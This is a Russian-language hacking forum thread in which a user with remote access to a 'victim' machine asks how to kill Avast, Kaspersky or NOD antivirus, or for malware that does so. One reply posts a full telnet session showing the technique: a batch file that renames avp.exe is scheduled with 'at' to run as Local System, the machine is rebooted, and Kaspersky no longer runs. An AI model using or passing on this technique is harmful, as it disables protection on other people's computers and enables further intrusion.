В общем вопрос такой: Как можно убить или временно обезвредить антивир имея полный доступ к удаленной машине, ко всем папкам, процессам, шеллу и т.д?? (интересует Аваст. Касперыч, Нод).. Ну или посоветуйте какуюнибудь малварину для подобных целей.. За ранее благодарен.
у обычных антивирусов можно просто грохнуть процесс/сервис и потом отрубить автозагрузку. с каспером сложнее )
В самом начале пробовал и на Ноде и на Авасте, процессы/сервисы не мрут) Тутже выплывают новые, либо так и стоят.. С автозагрузкой тоже самое.. Спасиб, над будет юзнуть.. Но если он представляет собой простой унинсталл то не получится, мышкой за жертву я "ок" нажимать не обладаю.. Ушел пробовать.. -- Не.. Защищен, не хочет.
Естественно, потому как просто админовских прав недостаточно. Подразумевалось, что пользователь сам способен поднять права. Демонстрирую небольшой лог моей telnet-сессии, как оное должно быть (с мини-комментариями, выделены зелёным, если надо полнее - отпишусь). Система - Windows XP Pro Sp2, KAV 7.0, потенциально будет работать и на других антивирусах. C:\>tasklist Code: Имя образа PID Имя сессии № сеанса Память ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 28 КБ System 4 Console 0 264 КБ smss.exe 548 Console 0 436 КБ csrss.exe 700 Console 0 3 668 КБ winlogon.exe 724 Console 0 4 688 КБ services.exe 888 Console 0 3 196 КБ lsass.exe 900 Console 0 1 388 КБ svchost.exe 1104 Console 0 4 852 КБ svchost.exe 1240 Console 0 4 324 КБ svchost.exe 1368 Console 0 21 720 КБ svchost.exe 1580 Console 0 3 376 КБ svchost.exe 1620 Console 0 4 816 КБ spoolsv.exe 1840 Console 0 4 784 КБ avp.exe 2024 Console 0 7 820 КБ tlntsvr.exe 272 Console 0 2 824 КБ alg.exe 912 Console 0 3 528 КБ explorer.exe 1504 Console 0 12 896 КБ [COLOR=Red]avp.exe 1788 Console 0 6 332 КБ[/COLOR] ctfmon.exe 1876 Console 0 2 992 КБ tlntsess.exe 1032 Console 0 3 768 КБ cmd.exe 1320 Console 0 1 608 КБ tasklist.exe 1148 Console 0 3 124 КБ wmiprvse.exe 760 Console 0 5 428 КБ Как видно, в процессах есть. Ищем папку, пытаемся переименовать. C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>move avp.exe avp.ex_ Отказано в доступе. Ожидаемый и печальный эффект, поднимаем права до Local System. C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>cd \ C:\>copy con kill_avp.bat @echo off cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" move avp.exe avp.ex_ ^Z Скопировано файлов: 1. C:\>type kill_avp.bat @echo off cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" move avp.exe avp.ex_ C:\>time Текущее время: 18:19:05,92 Введите новое время: C:\>at 18:20 c:\kill_avp.bat Добавлена новая задача с кодом 1 C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.exe Том в устройстве C не имеет метки. Серийный номер тома: D007-EFC9 Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0 28.06.2007 12:58 10 560 rescue32.exe 1 файлов 10 560 байт 0 папок 1 244 950 528 байт свободно C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.ex_ Том в устройстве C не имеет метки. Серийный номер тома: D007-EFC9 Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0 28.06.2007 12:51 218 376 avp.ex_ 1 файлов 218 376 байт 0 папок 1 244 950 528 байт свободно C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0> Ну вот, собственно говоря, и всё. C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>shutdown -r -t 0 сообщение от администратора в PAUL, 24.09.2008 18:25:55 The computer is shutting down...... Подключение к узлу утеряно. Вторая сессия: C:\Documents and Settings\admin>tasklist Code: Имя образа PID Имя сессии № сеанса Память ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 28 КБ System 4 Console 0 264 КБ smss.exe 552 Console 0 384 КБ csrss.exe 704 Console 0 3 220 КБ winlogon.exe 728 Console 0 9 352 КБ services.exe 892 Console 0 2 828 КБ lsass.exe 904 Console 0 5 692 КБ svchost.exe 1108 Console 0 4 452 КБ svchost.exe 1256 Console 0 4 020 КБ svchost.exe 1380 Console 0 17 056 КБ logonui.exe 1392 Console 0 3 508 КБ svchost.exe 1528 Console 0 3 128 КБ svchost.exe 1588 Console 0 3 764 КБ spoolsv.exe 1872 Console 0 4 396 КБ tlntsvr.exe 348 Console 0 2 608 КБ alg.exe 780 Console 0 3 276 КБ tlntsess.exe 788 Console 0 3 536 КБ wuauclt.exe 1232 Console 0 6 436 КБ cmd.exe 1360 Console 0 1 320 КБ tasklist.exe 1656 Console 0 3 112 КБ wmiprvse.exe 1688 Console 0 5 404 КБ Any more questions?
